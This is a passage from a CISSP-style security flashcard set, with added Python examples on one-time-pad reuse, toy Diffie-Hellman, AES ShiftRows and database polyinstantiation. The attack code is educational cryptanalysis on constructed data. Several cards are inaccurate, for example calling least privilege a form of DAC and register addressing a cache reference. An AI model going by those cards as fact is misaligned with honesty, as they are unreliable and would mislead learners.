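The XOR and Vernam cipher cards together, as working code: a round trip with a random pad, and what goes wrong when the pad is reused. This is an added example and not part of the study set; the two messages are constructed, os.urandom stands in for Vernam's random tape, and the function names are the example's own.

```python
"""XOR as a cipher: one-time-pad round trip and the key-reuse failure.

Added example covering the XOR and Vernam cipher cards; not from the study
set. Messages are constructed; os.urandom plays the role of the random tape.
"""
import os


def xor_bytes(a: bytes, b: bytes) -> bytes:
    if len(a) != len(b):
        raise ValueError("XOR operands must be the same length")
    return bytes(x ^ y for x, y in zip(a, b))


def vernam_encrypt(plaintext: bytes, key: bytes) -> bytes:
    """Ciphertext = plaintext XOR key; the key must be as long as the message."""
    return xor_bytes(plaintext, key)


vernam_decrypt = vernam_encrypt   # XOR is its own inverse: (p ^ k) ^ k == p


def two_time_pad_leak(c1: bytes, c2: bytes) -> bytes:
    """If the same pad encrypted both, c1 XOR c2 == p1 XOR p2: the key cancels."""
    return xor_bytes(c1, c2)


def recover_other_plaintext(c1: bytes, c2: bytes, known_p1: bytes) -> bytes:
    """Simplest crib: knowing (or guessing) p1 reveals p2 without the key."""
    return xor_bytes(two_time_pad_leak(c1, c2), known_p1)


def demo() -> dict:
    p1 = b"ATTACK AT DAWN"
    p2 = b"RETREAT AT SIX"            # same length, so one pad fits both
    key = os.urandom(len(p1))         # fresh random pad: unconditionally secure once
    c1 = vernam_encrypt(p1, key)
    c2 = vernam_encrypt(p2, key)      # the mistake: the pad is used a second time
    return {
        "roundtrip": vernam_decrypt(c1, key),
        "xor_of_ciphertexts": two_time_pad_leak(c1, c2),   # independent of key
        "recovered_p2": recover_other_plaintext(c1, c2, p1),
    }


if __name__ == "__main__":
    print(demo())
```

The single round trip is why XOR is the "secret sauce": decryption is the same operation as encryption. The second half is the operational caveat: the XOR of two ciphertexts under the same key no longer contains the key at all, which is why a one-time pad is only secure when it is truly used once, and why stream-cipher keystream reuse (same key and nonce) is a complete break.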
Active-passive cluster
Involves devices or systems that are already in place, configured, powered on, and ready to begin processing network traffic should a failure occur on the primary system.
Active-active cluster
Involves multiple systems all of which are online and actively processing traffic or data
Partial and Complete Business Interruption
Involves real interruption. Extreme caution should be exercised before attempting an actual interruption test.
Smoke detectors
Ionization and Photoelectric. Dust can trigger leading to false alarms
Free software
Is a controversial term that is defined differently by different groups.
Kerberos Steps
1. Kerberos principal Alice contacts the KDC. 2. The KDC sends Alice a session key, encrypted with Alice's secret key, and a TGT (Ticket Granting Ticket), encrypted with the TGS's secret key. 3. Alice decrypts the session key and uses it (with the TGT) to request permission to print from the TGS (Ticket Granting Service). 4. Seeing Alice has a valid session key (and therefore has proven her identity claim), the TGS sends Alice a C/S session key (second session key) to use to print, plus a service ticket encrypted with the printer's key. 5. Alice connects to the printer. The printer, seeing a valid C/S session key, knows Alice has permission to print and that she is authentic. ***KDC and TGS are separate services.***
Kerberos FAQ
Kerberos is a network authentication system for use on physically insecure networks, based on the key distribution model presented by Needham and Schroeder. It allows entities communicating over networks to prove their identity to each other while preventing eavesdropping or replay attacks. It also provides for data stream integrity (detection of modification) and secrecy (preventing unauthorized reading) using cryptography systems such as DES (Data Encryption Standard).
Key Clustering
Key Clustering occurs when two symmetric keys applied to the same plaintext produce the same ciphertext
Diffie-Hellman Key Agreement Protocol
Key agreement allows two parties to securely agree on a symmetric key via a public channel, such as the Internet, with no prior key exchange
Key locks
Key locks require a physical key to unlock. Many keys contain the bitting code for the key. 74226. 0-9(0 shallow, 9 quite deep
Expert Systems
Knowledge Base and Inference Engine
Rijndael
Known as AES. Best combination of security, performance, efficiency, and flexibility.
Costliness of DRP Testing
From LEAST to MOST costly: DRP review; read-through/checklist/consistency; structured walkthrough/tabletop; simulation test/walkthrough drill; parallel processing; partial interruption; complete business interruption.
Wiring closets
Lack of security regarding wiring closets present a physical access issue
Progressive Discipline
Ladder of discipline: coaching; formal discussion; verbal warning meeting, with Human Resources in attendance; written warning meeting, with Human Resources in attendance (perhaps multiple warnings); termination.
Microsoft LM
LanMan passwords are converted to upper case before hashing, so case sensitivity is irrelevant; the hash is also computed over two independent 7-character halves, which makes LM hashes trivial to crack.
Bridge
Layer 2 device with 2 ports that connects network segments together; each segment may have multiple nodes. Learns the MAC addresses of the nodes on either side and forwards frames only when needed, providing traffic isolation. Creates 2 collision domains (one per port).
Application Layer Proxy Firewalls
Makes decisions based on Application Layer Data(e.g. HTTP Traffic). Must understand the protocol that Is proxied (often dedicated)
Virtualization Issues
Multiple hosts on one system raises security concerns.
SDLC 9
Operations and Maintenance
Discrete Logarithm
The inverse of exponentiation. Computing 7 to the 13th power (exponentiation) is easy on a modern calculator: 96,889,010,407. Asking "96,889,010,407 is 7 to what power?" is the logarithm. When the arithmetic is done modulo a large prime, answering that question (the discrete logarithm) is computationally hard, which is what Diffie-Hellman relies on.
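The Diffie-Hellman and discrete logarithm cards as one worked exchange: both parties derive the same key from values sent in the clear, and an eavesdropper's only route is the discrete log. This is an added example and not part of the study set; the generator 7 and exponent 13 are the card's, the toy prime is chosen here so that the brute-force search finishes instantly, and the function names are the example's own.

```python
"""Diffie-Hellman over a public channel, and why it rests on the discrete log.

Added example for the Diffie-Hellman and Discrete Logarithm cards; not from
the study set. Parameters are toy-sized so brute force is fast; real
deployments use 2048-bit groups or elliptic curves.
"""

P = 2147483647          # 2**31 - 1, a Mersenne prime (constructed toy group)
G = 7                   # generator, matching the card's 7**13 example


def dh_public(private: int, p: int = P, g: int = G) -> int:
    """Exponentiation (the easy direction): g**private mod p, fast via pow()."""
    return pow(g, private, p)


def dh_shared(private: int, other_public: int, p: int = P) -> int:
    """Each side raises the other's public value to its own private exponent."""
    return pow(other_public, private, p)


def brute_force_discrete_log(target: int, p: int = P, g: int = G,
                             limit: int = 1 << 22) -> int:
    """Discrete log (the hard direction): find x with g**x mod p == target.

    Stepping through x works here because the exponent is tiny; for a real
    group the search space makes this (and the smarter algorithms) infeasible.
    """
    value = 1
    for x in range(limit):
        if value == target:
            return x
        value = (value * g) % p
    raise ValueError("exponent not found within limit")


def exchange(alice_private: int, bob_private: int) -> dict:
    """The protocol: only alice_public and bob_public cross the wire."""
    alice_public = dh_public(alice_private)
    bob_public = dh_public(bob_private)
    return {
        "alice_public": alice_public,
        "bob_public": bob_public,
        "alice_key": dh_shared(alice_private, bob_public),
        "bob_key": dh_shared(bob_private, alice_public),
    }


def eavesdropper_key(alice_public: int, bob_public: int) -> int:
    """What an attacker must do: solve the discrete log, then finish the exchange."""
    recovered_alice_private = brute_force_discrete_log(alice_public)
    return dh_shared(recovered_alice_private, bob_public)


if __name__ == "__main__":
    ex = exchange(13, 2021)
    print(ex["alice_key"] == ex["bob_key"], eavesdropper_key(ex["alice_public"], ex["bob_public"]))
```

With these parameters the eavesdropper wins, which is the point of the example: the security of the agreement is exactly the cost of that loop. Note also that plain Diffie-Hellman authenticates nobody; without signatures or certificates on the public values, an active attacker can run two separate exchanges and sit in the middle.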
Diffusion
Order of plaintext should be diffused in the ciphertext.
Data Collection Limitation
Organization should collect the minimum amount of sensitive information that is required. There should be limits to the collection of personal data.
Key Storage
The organization that issues the public/private key pairs retains a copy.
OFDM
Orthogonal Frequency-Division Multiplexing
Shared Tenancy
Other tenants pose a risk because they are already behind perimeter. Adjacent buildings also pose a risk. British Bank of the Middle East(1976...Hole in Church)
OFB
Output Feedback. Differs from CFB in the way feedback is accomplished: CFB feeds the previous ciphertext block back into the cipher, while OFB feeds back the cipher's own keystream output (the encrypted IV), independent of the ciphertext. **STREAM** mode.
Halon
Ozone depleting properties. Chemical reaction that consumes energy and lowers the temperature of the fire. See Montreal Protocol.
PDA
PDAs should use secure wireless connections
SPF10
Mnemonic for the PDUs of Layers 4 down to 1: Segments, Packets, Frames, Ones and zeroes (bits).
PCI-DSS
Payment Card Industry Data Security Standards. Industry Specific. Created by PCI-SSC. Standards seek to protect credit cards by requiring vendors using them to take specific security precautions. It is a multi-faceted security standard that includes requirements for security management. Protecting customer data.
Arithmetic Logic Unit(ALU)
Performs mathematical calculations. It computes. It is fed instructions by the control unit which acts as traffic cop
PII
Personally Identifiable Information
Conflicts Of Interest(CoIs)
Pertain to accessing sensitive information from different companies that are in direct competition with one another. E.g., the Chinese Wall (Brewer-Nash) model requires that CoI classes be identified, so that once a consultant gains access to one company's data in a CoI class, access to competitors' data in that class is denied.
Crosstalk
Poorly shielded or too close cable impacts a separate conversation.
PAT
Port Address Translation. typically makes a many-to-one translation from multiple private addresses to one public IP address. Solution for homes and small offices.
PGP
Pretty Good Privacy brought asymmetric encryption to the masses (1991). Users can communicate without first sharing a key. Provides confidentiality, integrity, authentication, and nonrepudiation. Used to encrypt emails, documents, or disk drives. Web of Trust model: "trust me, and trust everyone I trust."
Controlling Access
Preventing unauthorized access.
Access Control Types(6)
Preventive Detective Corrective Recovery Deterrent Compensating
Locks
Preventive physical security control.
Memory Protection
Prevents one process from affecting the confidentiality, integrity, or availability of another.
Computer Bus
Primary communication channel on a computer system. Communication between CPU, Memory, I/O Devices occur via the bus.
Microsoft Windows Active Directory
Primary means to control access. Uses Kerberos. Has been integrated into Microsoft Windows operating systems since Windows 2000
Factoring prime numbers
Prime Number: divisible by 1 and itself Composite Number: Evenly divisible by numbers other than 1 and itself. Eg: "which prime number times which prime number equals 49,418,527" is much more difficult
RFC 1918 addresses
Private IPv4 addresses that may be used for internal traffic 10.0.0.0 - 10.255.255.255/8 172.16.0.0 - 172.31.255.255/12 192.168.0.0 - 192.168.255.255/16
UPSs
Protect against power failures. Backup power is provided via batteries or fuel cells.
Surge Protectors,
Protect against power spikes and surges: a circuit or fuse that trips when the voltage exceeds a threshold.
Canons(1)
Protect society, the commonwealth, and the infrastructure.
PEAP
Protected EAP; Cisco Systems, Microsoft, and RSA Security, is similar to (and may be considered a competitor to) EAP-TTLS. Doesn't require client-side certificates.
Data Execution Prevention
Protection against memory corruption. Ensures that memory locations not pre-defined to contain executable content will not have the ability to have code executed. Prevents shell code execution
Link State Routing Protocols
Protocol factors in additional metrics for determining the best route, including bandwidth.
Virtual Memory
Provides virtual addresses between applications and physical memory. ***Allows swapping***
Canons(3)
Provide diligent and competent service to principals.
Ten Commandments of Computer Ethics
Provided by the Computer Ethics Institute as code for information security professionals to abide by.
Network Tap
Provides a way to tap into network traffic and see all traffic(including all unicast) Taps are the preferred way for access to sniffer or NIDS
Authentication Header(AH)
Provides authentication and integrity for each packet of the network data. Acts as a digital signature for The data. Protects against replay attacks.
Secure Real-time Transport Protocol
Provides confidentiality, integrity, and secure authentication for RTP. VoIP traffic sent via insecure networks should be secured via SRTP.
ShiftRows
Provides diffusion by shifting the rows of the AES state: row 0 is unchanged; row 1 is rotated 1 byte left; row 2 is rotated 2 bytes left; row 3 is rotated 3 bytes left.
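The row rotations above on a 4x4 AES state, with the inverse used in decryption and a check that the step really spreads each column's bytes across all four columns. This is an added example and not part of the study set; the 16-byte state is constructed (byte value equals original position so the movement is visible), and the function names are the example's own.

```python
"""AES ShiftRows on a column-major 4x4 state, with its inverse.

Added example for the ShiftRows card; not from the study set. AES stores the
16-byte block column by column: byte index i lands in row i % 4, column i // 4.
"""


def bytes_to_state(block: bytes) -> list:
    if len(block) != 16:
        raise ValueError("AES state is exactly 16 bytes")
    return [[block[row + 4 * col] for col in range(4)] for row in range(4)]


def state_to_bytes(state: list) -> bytes:
    return bytes(state[row][col] for col in range(4) for row in range(4))


def shift_rows(state: list) -> list:
    """Row r is rotated r positions to the left (row 0 is unchanged)."""
    return [row[r:] + row[:r] for r, row in enumerate(state)]


def inv_shift_rows(state: list) -> list:
    """Row r is rotated r positions to the right, undoing shift_rows."""
    return [row[-r:] + row[:-r] if r else row[:] for r, row in enumerate(state)]


def source_columns_after_shift(col: int) -> set:
    """Which input columns feed output column `col` after ShiftRows.

    Uses a constructed state whose byte value equals its original index, so
    value // 4 is the column each byte came from. Every column drawing from
    all four input columns is the diffusion the card describes.
    """
    shifted = shift_rows(bytes_to_state(bytes(range(16))))
    return {shifted[row][col] // 4 for row in range(4)}


if __name__ == "__main__":
    for row in shift_rows(bytes_to_state(bytes(range(16)))):
        print(row)
```

ShiftRows only moves bytes; combined with MixColumns (which mixes within a column) it is what makes a change in one input byte affect the whole block after a couple of rounds. Decryption applies inv_shift_rows, which is why the round-trip check in the test is the useful assertion here.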
Custodian
Provides hands-on protection of assets such as data. Follow detailed orders.
Tailoring Process: 6
Providing additional specification information for control implementation, if needed. Tailoring process involves "parameters" including; password complexity policies
Fire Suppression
Reduce Temperature Reduce Oxygen Supply Reduce Fuel Supply Interfere Reaction
RISC
Reduced Instruction Set Computer. Uses a reduced set of simpler instructions.
Register Direct Addressing
References a CPU cache register
Internet of Things (IOT)
Refers to the growing population of Internet-connected devices: smart meters, baby monitors, cash registers, cars, fitness monitors. Such devices are often directly accessible via the Internet.
Covert Timing Channel
Relies on system clock to infer sensitive information
Remediation
Remediation steps occur during the mitigation phase, where vulnerabilities within the impacted system or systems are mitigated.
RADIUS
Remote Authentication Dial In User Service, a third-party authentication system. UDP ports 1812 (authentication) and 1813 (accounting); legacy implementations used 1645 and 1646. Provides authentication, authorization, and accounting (AAA).
Overwriting
Results are poor. It is not a universally reliable method of sanitization.
RARP
Reverse ARP. used by diskless workstations to determine its IP address. "Who am I? Tell me."
SSL
Secure Socket Layer designed to protect HTTP (Hypertext Transfer Protocol) data: HTTPS uses TCP port 443. May be used to encrypt many types of data. SSL client software does not require altering the operating system
SAML
Security Assertion Markup Language. XML-based framework for exchanging security information (authentication and authorization assertions), used for web single sign-on.
NIST SDLC Step 13
Security Operations and Administration: Examples include backups, training, managing cryptographic keys, user administration, and patching.
NIST SDLC Step 10
Security Testing: Used to certify a system; may include testing security management, physical facilities, personnel, procedures, the use of commercial or in-house services (such as networking services), and contingency planning.
NIST Special Publication 800-53
Security and Privacy Controls for Federal Information Systems and Organizations
Mobile Device Attacks
Security challenges ranging from USB flash drives to laptops.
NIST Special Publication 800-14
Security, like other aspects of an IT system, is best managed if planned for throughout the IT system life cycle. There are many models for the IT system life cycle but most contain five basic phases: initiation, development/acquisition, implementation, operation, and disposal."
IAB Practice 1
Deemed unethical by the IAB in "Ethics and the Internet" (RFC 1087): seeking to gain unauthorized access to the resources of the Internet.
Confidentiality
Seeks to prevent the unauthorized disclosure of information: it keeps data secret
Tailoring Process: 3
Selecting compensating security controls, if needed;
Half Duplex
Send or receive at one time only (Walkie Talkie)
RSA
Used to securely send a symmetric (e.g., AES) session key: the session key is encrypted with the recipient's RSA public key, and a fresh session key may be sent via RSA for each session. This hybrid approach leverages the strengths of both cryptosystems.
Backups
Sensitive backup data should be stored offsite, whether transmitted offsite via networks, or physically moved as backup media. Ensure backup sites are unlikely to be impacted by the same disaster that may strike the primary site.
Software Defined Networking
Separates a router's control plane (routing decisions) from its data plane, which forwards packets through the router.
Layering
Separates hardware and software functionality into modular tiers
Flat file
Simplest form of a database
SSO Advantages
Simplified administration, Improved user productivity, Improved developer productivity.
SSO
Single Sign-On is where a subject may authenticate once, and then access multiple systems
Tuple
A single row (record) in a relational database table; a column is an attribute.
"Point. Click. Root"
Slogan illustrates the fact that script kiddie tools such as the Metasploit Framework are of high quality and can achieve impressive results.
Pre-Action
Systems are a combination of wet, dry, or deluge systems, and require two separate triggers to release water
T Carriers
T1 is a dedicated 1.544-megabit (1.5mb) A T3 is 28 bundled T1s(45 mb)
TACACS+
TACACS+ provides better password protection by allowing two-factor strong authentication and encrypting the entire packet body. Uses TCP port 49 for communication with the TACACS+ server.
IRC server
TCP port 6667 by default. Used by malware, which may "phone home" to a command-and-control channel via IRC. Chat software may be subject to various security issues, including remote exploitation, and must be patched like any other software
***Note***
For the exam, TCP, UDP, and ICMP are treated as Layer 4. ICMP is carried inside IP, and many references place it at Layer 3 as a helper protocol to IP.
BCP/DRP Reminder
These are the final controls. If these fail, the business can fail. "Have we made mistakes that threaten the success of our plan?"
Transport Mode
Transport Mode only encrypts the data (and not the original headers); AH is often used along with ESP in transport mode.
TDES
Triple Data Encryption Standard: Public algorithm that has stood the test of time
4 Types of events
True Positive, True Negative, False Positive, and False Negative.
TCSEC(AKA "The Orange Book")
Trusted Computer System Evaluation Criteria. See also ITSEC and the Common Criteria. Criteria and evaluation method for choosing security products. Divisions: D, Minimal Protection; C, Discretionary Protection; B, Mandatory Protection; A, Verified Protection. One of the first security standards implemented.
TNI/Red Book
Trusted Network Interpretation (TNI) brings TCSEC concepts to network systems. It is often called the "Red Book" due to the color of its cover. *TCSEC itself does not address network issues.
Tunnel Mode
Tunnel mode provides confidentiality (ESP) and/or authentication (AH) to the entire original packet. Both modes add extra IPsec headers
Fuzzing
Type of black box testing that submits random or malformed data as input to a program to determine whether it will crash: random input strings, command-line arguments, environment variables, file formats. Any program that crashes (or hangs, or corrupts memory) has failed the fuzz test; a program that cleanly rejects bad input has not.
Software Testing Levels
Unit Testing, Installation Testing, Integration Testing, Regression Testing, and Acceptance Testing
UTP
Unshielded Twisted Pair; susceptible to EMI and crosstalk
Fiber Optic Cables
Use light instead of electricity to Transmit Data
Digital Watermarks
Used for fingerprinting data, images.
Trunks
Used to connect multiple switches.
Digital Signatures
Used to cryptographically sign documents. Provide nonrepudiation, including authentication of the identity and integrity of the data. ***Does not provide confidentiality***
Port Isolation
Used to ensure that individual systems cannot interact with other resources even if logically on the same subnet.
Couriers
Used to transfer media to and from offsite storage facility
Distance Vector Routing Protocols
Uses metrics to determine best route. i.e. hop count. Prone to routing loops where packets loop between two routers.
Covert Storage Channel
Uses shared storage, such as a temporary directory, to allow subjects to signal each other.
Encryption Keys in RAM
Usually exist in plaintext in RAM. May be recovered by "cold booting" a computer off a small OS installed
TCSEC Division A
Verified Protection, with a single class A1 (Verified Design). A1 contains everything class B3, plus additional controls.
Database Views
Views may be used to provide a constrained user interface
VLAN
Virtual LAN: a logical network segment configured on a switch. VLANs can take the place of separate physical switches, e.g. for computer and server LANs, but traffic between VLANs still needs routing and access control.
Boot sector virus
Virus that infects the boot sector of a PC. Loads upon system start
EAP-MD5
Weak form of EAP. It offers client → server authentication only. EAP-MD5 is also vulnerable to password cracking attacks
RAM & Virtual Memory
When RAM is full/nearly full The system will then swap process to virtual memory. Searches for idle processes so Impact is minimal
Entrapment
When law enforcement, persuades someone to commit a crime when the person otherwise had no intention to.
Storing Sensitive Information
When storing sensitive information; encrypt it. Encryption of data at rest ensures confidentiality. Chain of custody(physical security controls) are important in considering during transfer.
Kernel Mode(Supervisor Mode)
Where the kernel is. Allows low-level access to memory, CPU, disk, etc. Most trusted and powerful part of a system.
Layer 7 - Application
Where you interface with your computer application. Your Web browser, word processor, and instant messaging client exist
Polyinstantiation
Allows two different objects to have the same name. Database polyinstantiation means two rows have the same primary key but different data, typically distinguished by classification level, so that a lower-cleared user's insert does not reveal the existence of a higher-classified row.
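The database case in SQLite: first the single-column key that leaks, then a key that includes the classification so the same logical key can exist at two levels. This is an added example and not part of the study set; the schema, the flight rows and the clearance levels are constructed, and the function names are the example's own.

```python
"""Database polyinstantiation with SQLite.

Added example for the Polyinstantiation card; not from the study set. The
schema, rows and clearance levels are constructed for the example.
"""
import sqlite3

LEVELS = {"Unclassified": 0, "Secret": 1, "TopSecret": 2}


def leak_without_polyinstantiation() -> bool:
    """Single-column key: a lower-cleared insert collides with the hidden row.

    The IntegrityError tells the Secret user that a Top Secret row for this
    flight already exists, which is an inference channel.
    """
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE flights (flight_id TEXT PRIMARY KEY, "
                 "level INTEGER NOT NULL, destination TEXT NOT NULL)")
    conn.execute("INSERT INTO flights VALUES ('FL-100', 2, 'Alpha')")   # Top Secret row
    try:
        conn.execute("INSERT INTO flights VALUES ('FL-100', 1, 'Bravo')")  # Secret user
    except sqlite3.IntegrityError:
        return True
    return False


def make_db() -> sqlite3.Connection:
    """Polyinstantiated schema: classification is part of the primary key."""
    conn = sqlite3.connect(":memory:")
    conn.execute("""
        CREATE TABLE flights (
            flight_id   TEXT    NOT NULL,
            level       INTEGER NOT NULL,
            destination TEXT    NOT NULL,
            PRIMARY KEY (flight_id, level)
        )""")
    conn.execute("INSERT INTO flights VALUES ('FL-100', ?, 'Alpha')", (LEVELS["TopSecret"],))
    conn.commit()
    return conn


def insert_as(conn: sqlite3.Connection, clearance: str, flight_id: str, destination: str) -> None:
    """A subject writes at its own level; a same-key row at a higher level stays hidden."""
    conn.execute("INSERT INTO flights VALUES (?, ?, ?)",
                 (flight_id, LEVELS[clearance], destination))
    conn.commit()


def view_as(conn: sqlite3.Connection, clearance: str) -> dict:
    """Return, per flight_id, the highest-level row the subject is cleared to read."""
    rows = conn.execute(
        "SELECT flight_id, level, destination FROM flights "
        "WHERE level <= ? ORDER BY flight_id, level",
        (LEVELS[clearance],)).fetchall()
    visible = {}
    for flight_id, _level, destination in rows:   # ascending level: highest wins
        visible[flight_id] = destination
    return visible


if __name__ == "__main__":
    db = make_db()
    insert_as(db, "Secret", "FL-100", "Bravo")
    for clearance in LEVELS:
        print(clearance, view_as(db, clearance))
```

The view query is where the policy lives: filtering on `level <= clearance` is what turns the duplicated key into a different answer for different subjects, and the Secret user's insert succeeds without ever learning that a Top Secret row shares its key.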
WRT
Work Recovery Time describes the time required to configure a recovered system
Call Tree
Work around To congestion on phonelines during disaster.
Right to Audit
Written approval on behalf of the organization being audited that allows the third party to commence the audit.
Macrovirus
Written in macro language (Microsoft office, excel)
Honeynets
A (real or simulated) network of honeypots. Honeynets involve an entire network of systems and services that lack any legitimate devices, so any traffic to them is suspect.
DLP
a class of solutions that are tasked specifically with trying to detect or, preferably, prevent data from leaving an organization in an unauthorized manner.
Solid State Drives
a combination of flash memory and DRAM. Degaussing has no effect. SSD's have logical blocks and are mapped to physical blocks
Password Control
a concern for management as well as the IT security professional. Written down, etc.
Key Escrow
a copy of the key is retained by the third-party organization(sometimes multiple...)
Cipher
a cryptographic algorithm
Integrated Product Team
a customer-focused group that focuses on the entire lifecycle of a project
Systems Development Life Cycle
a development model that focuses on security in every phase
Authenticator
a device such as an access point that allows a supplicant to authenticate and connect
Programmable Logic Device (PLD)
a field-programmable device, which means it is programmed after it leaves the factory. EPROMs, EEPROMs, and flash memory are all examples.
Acceptance Testing(ISTQB)
formal testing with respect to user needs, requirements, and business processes conducted to determine whether or not a system satisfies the acceptance criteria and to enable the user, customers or other authorized entity to determine whether or not to accept the system.
Internet
a global collection of peered networks running TCP/IP, providing best effort service
Message Authentication Code(MAC)
a hash function that uses a key. A common MAC implementation is Cipher Block Chaining Message Authentication Code (CBC-MAC), e.g. using DES.
Policy
a high-level management directive. Policy is mandatory. It does not delve into specifics, e.g. a company's sexual harassment policy.
Foreign Key
a key in a related database table that matches a primary key in a parent database table.
Hot site
a location that an organization may relocate to following a major disruption or disaster. It is a datacenter with a raised floor, power, utilities, computer peripherals, and fully configured computers.
Assembly language
a low-level computer programming language, e.g. "SUB", "ADD", "JMP".
Aggregation
a mathematical attack where an attacker aggregates details at a lower classification to determine information at a higher classification
State Machine Model
a mathematical model that groups all possible system occurrences, called states. States are evaluated and the overall system is proven to be secure upon close of evaluation.
Aggregation
a mathematical process: a user asks every question, receives every answer, and derives restricted information.
Dumpster Diving
a physical attack in which a person recovers trash in hopes of finding sensitive information.
Topography
the physical shape of the land: hills, valleys, trees, etc. Highly secure sites will leverage topography, e.g. military sites.
Continuity of Operations Plan
a plan to maintain operations during a disaster.
Tuple
a row, entry in a relational database table.
Disaster Recovery Plan
a short-term plan to recover from a disruptive event
Backdoor
a shortcut in a system that allows a user to bypass security checks (skipping username/password authentication).
Bayesian Filtering
a simple mathematical formula used for calculating conditional probabilities. A modern application is identifying spam.
Spiral Model
a software development model designed to control risk
Database
a structured collection of related data. Databases allow queries (searches), insertions (updates), deletions, and many other functions.
Honeypots
a system designed to attract attackers. Internal honeypots can provide high-value warnings of internal malware or attackers. Consult with legal staff before deploying a honeypot
Polymorphic virus
a virus that changes its signature upon infection of a new system, attempting to evade signature-based antivirus software.
Vulnerability
a weakness in a system
NDA
a work-related contractual agreement that ensures that, prior to being given access to sensitive information or data, an individual or organization appreciates their legal responsibility to maintain the confidentiality of that sensitive information.
Authorization
actions authenticated subjects are allowed to perform on a system
MAC Address
the unique hardware address of an Ethernet network interface card (NIC), typically "burned in". 48-bit or 64-bit (EUI-64).
Privilege escalation
allows an attacker with (typically limited) access to access additional resources.
Network Model(People)
allows branches of a hierarchical database to have two parents. E.g. an organization's hierarchy.
European Union(EU) Privacy Directive
allows for the free flow of information while still maintaining consistent protection of each member nation's citizens' data
DHCP
allows more configuration options, as well as assigning temporary IP address leases to systems
Salt
allows one password to hash multiple ways. Some systems (like modern UNIX/Linux systems) combine a salt with a password before hashing
Data Analytics
allows an organization to better understand the typical use cases and a baseline of what constitutes typical or normal interaction with the database.
Lattice-Based Access Controls
allows security controls for complex environments. There are defined upper and lower access limits implemented by the system. Allows reaching higher and lower data classifications, depending on the needs of the customer. Subjects have a Least Upper Bound and a Greatest Lower Bound.
Pivot
allows the attacker to establish a foothold "behind enemy lines" (behind the firewall) and surf to internal websites, etc. Horizontal escalation is a form of pivoting: from one non-privileged user to another non-privileged user.
Gateway-to-gateway(IPsec)
(also called point-to-point) connects two IPsec gateways.
The Operational Acceptance test
also known as the Production Acceptance Test; validates whether the system meets the requirements for operation.
Due Diligence
always meeting or exceeding the requirements for protection of assets. Prudent in investigation of potential threats.
Extreme Programming(XP)
an Agile development method that uses pairs of programmers who work from a detailed specification.
Nonrepudiation
an assurance that a specific user performed a specific transaction. The user cannot repudiate (deny) it.
Password guessing
an online technique that involves attempting to authenticate a particular user to the system
Common Object Request Broker Architecture
an open vendor-neutral networked object broker framework by the Object Management Group. Competes with Microsoft DCOM.
End User License Agreements (EULAs)
an unusual form of contract because using software typically constitutes contractual agreement.
Subject
an active entity on an information system.
Covert channel
any communication that violates a security policy. Used by malware installed on a system that locates.
Disaster
any disruptive event that interrupts normal system operations
Hybrid Attacks
appends, prepends, or changes characters in dictionary words before hashing, attempting the fastest crack of complex passwords. Example: replaces each letter "o" with the number "0".
Triple DES
applies single DES encryption three times per block. Formally called TDEA. Held up well after years of cryptanalysis. Its primary weakness is that it is slow. Encrypt, Decrypt, Encrypt. Keying options use one, two, or three unique keys: 1TDES EDE, 2TDES EDE, 3TDES EDE.
Reciprocal agreements
a bi-directional agreement between two organizations in which one organization promises another organization that it can move in and share space if it experiences a disaster.
Maintenance hooks
are a type of backdoor: they are shortcuts installed by designers and programmers to allow developers to bypass normal system checks during development.
Fourth-generation programming languages (4GL)
are computer languages that are designed to increase programmers' efficiency by automating the creation of computer programming code.
DRP Review
the basic form of initial DRP testing, focused on simply reading the DRP in its entirety to ensure completeness of coverage.
Respond
begins the process of assessing the damage
Combinatorial software testing
black-box testing method that seeks to identify and test all unique combinations of software inputs
Physical Countermeasures
building, office security, locks, security guards, mobile device encryption.
DHCPv6
called "stateful autoconfiguration".
Corrosion
can be caused by High Humidity Levels
VLAN
can be thought of as a virtual switch. Acts as both a computer switch and a server switch. FF:FF:FF:FF:FF:FF traffic will reach all computers but not servers.
Credential Management Systems
can help harden user credentials in meaningful ways.
Object-Oriented Programming
changes the older procedural programming methodology, and treats a program as a series of connected objects that communicate via messages
Organization for Economic Cooperation and Development (OECD)
consists of 30 member nations from around the world. Provides a basic framework for the protections that should be afforded to personal data.
Botnet
contains a central command and control network, managed by humans called bot herders. The term zombie is used to describe a bot. Many use IRC.
Take-Grant Protection Model
contains rules that govern the interactions between subjects and objects, and the permissions subjects can grant to other subjects. Rules include: take, grant, create, and remove.
Hypervisor
controls access between virtual guests and the host. A Type 1 Hypervisor (bare metal) is part of an operating system that runs directly on host hardware, e.g. VMware ESX. A Type 2 Hypervisor runs as an application on a normal operating system.
Encryption
converts plaintext to ciphertext
Data Controllers
create and manage sensitive data within an organization. HR employees are often data controllers.
Genetic programming
creates random programs and assigns them a task of solving a problem. The fitness function describes how well they perform their task
Utility Reliability
critical for site selection. Protecting against outages and failures is key.
Digital forensics
dealing with investigations and evidence with special consideration of the legal aspects of this process
Standards
describe the specific use of technology. Often applied to hardware. Standards are mandatory. They lower the Total Cost of Ownership(TCO)
Work Factor
describes how long it will take to break a cryptosystem.
Mean Time to Repair
describes how long it will take to recover a failed system
Throughput
describes the process of authenticating to a biometric system. A typical throughput is 6-10 seconds.
Layer 1 - Physical
describes units of data such as bits represented by energy
Scope(Policy)
describes what systems, people, facilities, and organizations are covered by the policy.
Network Model
description of how a network protocol suite operates. OSI Model
Chinese Wall Model
designed to avoid conflicts of interest by prohibiting one person, such as a consultant, from accessing multiple conflict of interest categories (CoIs)
Analog
designed to carry the human voice. A vinyl record is analog
Diameter
designed to provide an improved Authentication, Authorization, and Accounting (AAA) framework. Diameter uses a single server to manage policies for many services, as opposed to RADIUS, which requires many servers to handle all of the secure connections.
Duress Warning Systems
designed to provide immediate alerts to personnel in the event of emergencies: violence, weather, chemical contamination. E.g. speaker systems.
Destruction
destructive methods include: incineration, pulverizing, shredding, and bathing metal components in acid.
BRP
details the steps required to restore normal business operations after recovering from a disruptive event
Closed Circuit Television (CCTV)
detective device used to aid guards in detecting the presence of intruders in restricted areas. Key issues include depth of field (the area that is in focus) and field of view (the entire area viewed by the camera). Pan and tilt. Backed up by magnetic tape.
Least Privilege
dictates that persons have no more than the access that is strictly required for the performance of their duties. Least Privilege is a form of Discretionary Access Control (DAC).
Static
discharges to balance a positive and negative electrical imbalance. Can cause damage to systems. Mitigated by proper humidity
Confidential
disclosure could cause damage to national security.
Top Secret
disclosure could cause exceptionally grave damage to national security.
Secret
disclosure could cause serious damage to national security.
Communicate
disseminating details regarding the organization's recovery status
Formal Access Approval
